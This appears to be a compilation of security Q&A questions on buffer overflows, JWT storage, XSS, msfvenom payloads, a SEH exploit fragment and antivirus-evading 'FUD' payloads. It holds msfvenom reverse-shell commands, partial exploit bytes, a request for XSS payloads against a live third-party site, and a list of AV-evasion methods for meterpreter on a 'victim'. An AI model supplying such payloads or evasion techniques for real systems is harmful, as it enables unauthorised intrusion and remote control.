BufferOverFlow – How come ESP points to the end of the payload

I just don’t understand how ESP points to the shellcode

let’s say we’ve sent this string

string = 100 * 'A' + 'BBBB' + 'CCCC'

I have filled the stack with ‘AAAA..’ and overwritten the EIP value, setting it to ‘BBBB’, and I got the segmentation fault as expected. What I don’t understand is that when debugging, ESP points directly to ‘CCCC’. Isn’t ESP pointing to the top of the stack, and since we have already filled the stack with ‘AAAA’, shouldn’t ESP be pointing to these AAAA?

Split a JWT between payload and signature

Context: I’m looking at storage solutions for JWT tokens on a single page application.

  1. Storing the JWT in the local storage is unsafe and prone to XSS attacks.
  2. Storing the JWT in a secure / HTTP only cookie is safer, but prone to CSRF attacks.

I’m studying the following scenario:

Upon authentication, a refresh token is stored in an http only secure cookie. It can only be used to get an access token.

Upon authorisation, the backend responds with a JWT access token. The header and payload part of the JWT are inside the response body. The token signature is not sent and is set in an http only secure cookie (same-site strict if possible, but let’s assume it’s not the case). The header + payload is stored in memory.

When making requests, the header + payload is sent via XHR/fetch by the SPA in an Authorisation header. The signature is sent along with the cookies. The backend concatenates both and verifies the signature.

Would such a mechanism be safe from XSS and CSRF attacks, or is it just adding unnecessary complexity? Since the cookie does not contain the full JWT, it seems like a CSRF attack would not be able to make requests. And an XSS attack would at least not be able to retrieve the full token (this is a mild protection at this point, since an XSS attack is possible, but still).

Note: I’ve read this question which is similar, but overly broad so I’m posting this to get a more precise answer.
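One way the backend side of the scheme described above could look, as an added example that is not from the original question: the token is issued as two separate strings and only verified when the Authorization header and the signature cookie are presented together. The HS256 secret, the cookie name jwt_sig and the plain-dict request shape are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed demo secret; a real backend loads this from configuration.
SECRET = b"constructed-demo-secret"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def issue_token(claims: dict) -> Tuple[str, str]:
    """Sign with HS256; return header.payload (for the response body) and the
    signature (for the HttpOnly, Secure cookie) as two separate strings."""
    header = b64url(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}"
    sig = b64url(hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest())
    return signing_input, sig

def verify_request(headers: dict, cookies: dict) -> Optional[dict]:
    """Reassemble header.payload (Authorization header) + signature (cookie) and
    verify. Both halves are required, so the cookie alone cannot authorise."""
    auth = headers.get("Authorization", "")
    sig = cookies.get("jwt_sig")
    if not auth.startswith("Bearer ") or sig is None:
        return None
    signing_input = auth[len("Bearer "):]
    if signing_input.count(".") != 1:
        return None
    # The server always recomputes HS256 itself; the token's alg field is ignored.
    expected = b64url(hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    payload = signing_input.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))

def demo() -> dict:
    """Constructed requests: only the combination the SPA itself sends is accepted."""
    hp, sig = issue_token({"sub": "alice", "role": "user"})
    forged = hp.split(".")[0] + "." + b64url(b'{"sub":"alice","role":"admin"}')
    return {
        "full": verify_request({"Authorization": "Bearer " + hp}, {"jwt_sig": sig}),
        "cookie_only": verify_request({}, {"jwt_sig": sig}),  # cross-site request: cookie, no header
        "header_only": verify_request({"Authorization": "Bearer " + hp}, {}),  # leaked header+payload, no cookie
        "forged_payload": verify_request({"Authorization": "Bearer " + forged}, {"jwt_sig": sig}),
    }
```

Note that a script running in the page itself can still call fetch with the in-memory half while the browser attaches the cookie, which is why the question describes the XSS benefit as mild.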

XSS payload for XMLHttpRequest()

The source code says as below:

<script>
  function doSearch(item) {
    url = 'https://api.mywebsite.com/search'
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.onreadystatechange = function() {
      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
        response = JSON.parse(xmlHttp.responseText);
        populateTable(response);
      }
      else if (xmlHttp.readyState == 4 && xmlHttp.status != 200) {
        console.log(xmlHttp.responseText);
      }
    }
    xmlHttp.open('POST', url, true);
    xmlHttp.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
    xmlHttp.setRequestHeader('Accept', 'application/json');
    data = {'searchTerm':item}
    xmlHttp.send(JSON.stringify(data));
  }

  var mockResponse = {
    "response" :
      [
        {
          "breed" : "german sheperd",
          "intelligence" : 3
        },
        {
          "breed" : "labrador retriever",
          "intelligence" : 7
        }
      ]
  }

  function populateTable(response) {
    document.getElementById('theTable').innerHTML = '';
    responseData = response['response'];
    for (i = 0; i < responseData.length; i++) {
      tr = document.createElement('tr');
      td1 = document.createElement('td');
      td1.setAttribute('class', 'column1');
      td1.innerText = responseData[i]['breed'];
      tr.appendChild(td1);
      td2 = document.createElement('td');
      td2.setAttribute('class', 'column2');
      td2.innerText = responseData[i]['intelligence'];
      tr.appendChild(td2);
      document.getElementById('theTable').appendChild(tr);
    }
  }
</script>

Is there any way I can achieve XSS with a pop-up?

msfvenom payload available formats

How can you tell the available output formats for a given payload in msfvenom? For example:

this won't work:

msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f elf > out.elf

but this will:

msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f raw > out.sh

and --list formats just shows every format in msfvenom

metasploit payload

I use msfvenom to make a payload app for Android and I share the app to another phone with its own network, then I install the app, but there is no reaction on my listener phone. For the host I used my listener IP that was in the phone's info. What IP do I have to use, and does the payload have to be -tcp- or HTTP? When I use the same network for my phones the payload works. Thanks for your reaction.

How to inject a good XSS payload in a vulnerable site

Please, I need help here. I discovered a shady Ponzi site with XSS vulnerability issues. The vulnerability is located in the registration page; all user input fields are vulnerable, which consist of the email field, phone number field and password field.

Please guys, what good XSS payload can I use to exploit this vulnerability and how do I go about it?

Thanks a lot.

What is this “prepare” variable used for in this SEH based buffer overflow payload?

I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took this PoC for my paper.

junk = "\x41" * 4091
nseh = "\x61\x62"
seh  = "\x57\x42"           # Overwrite Seh # 0x00420057 : {pivot 8}
prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107
...

I don’t really understand how it’s jumping over the next SEH.

  • What is \x61\x62 used for in the nseh variable?
  • What is the prepare variable used for?
  • How is it jumping to the shellcode?

I already understand that the \x57\x42 is used as a pointer to target a pop pop ret to trigger a second error but I am stuck after that…

Creating a FUD Payload

Hey I’ve been looking into ethical hacking recently and I’ve been really struggling to create a truly FUD payload that evades AV (Windows Defender I’m fine at avoiding.) I’ve tried various options (listed below) and none so far have been successful in creating a meterpreter session.

So I was just wondering if you guys know any less-known techniques that might work for successfully creating a payload and obtaining remote control to test and analyze on systems (I’m assuming delivering payloads and running them on the victim is the only option for remote control, as all remote exploits like EternalBlue and DoublePulsar are patched on modern PCs, right?). Also, even when I disable AV on the target and run the payload, the session doesn’t open, so I’m guessing the port isn’t open on the victim (443 is what I’m trying), so will I have to find a way to open that port in my file or disable the firewall completely?

Also just a guess, do you think generating payloads via less used RATs like Cobalt Strike will be more successful?

Thanks!

Methods Tried

-MSFvenom shikata_ga_nai encryption python payload to exe (via pyinstaller and Fern Obfuscator); got 2 hits with this on VirusTotal.com, but Norton on the victim still discovered it and running it didn’t connect (Norton labels it as a “heuristic virus”). Tried staged and stageless payloads, as well as HTTPS or reverse_tcp.

-Powershell one-liner command (Norton intercepts and disables)

-Regsvr one-liner command (Again picked up by Norton)

-Custom VBS script compiled to an exe (picked up and unable to connect to attacker even without AV on)

-Phantom and Veil-evasion (both picked up by AV)

-AsyncRat with custom payload (picked up by AV and didn’t work when run)

-Powershell Rat (didn’t work)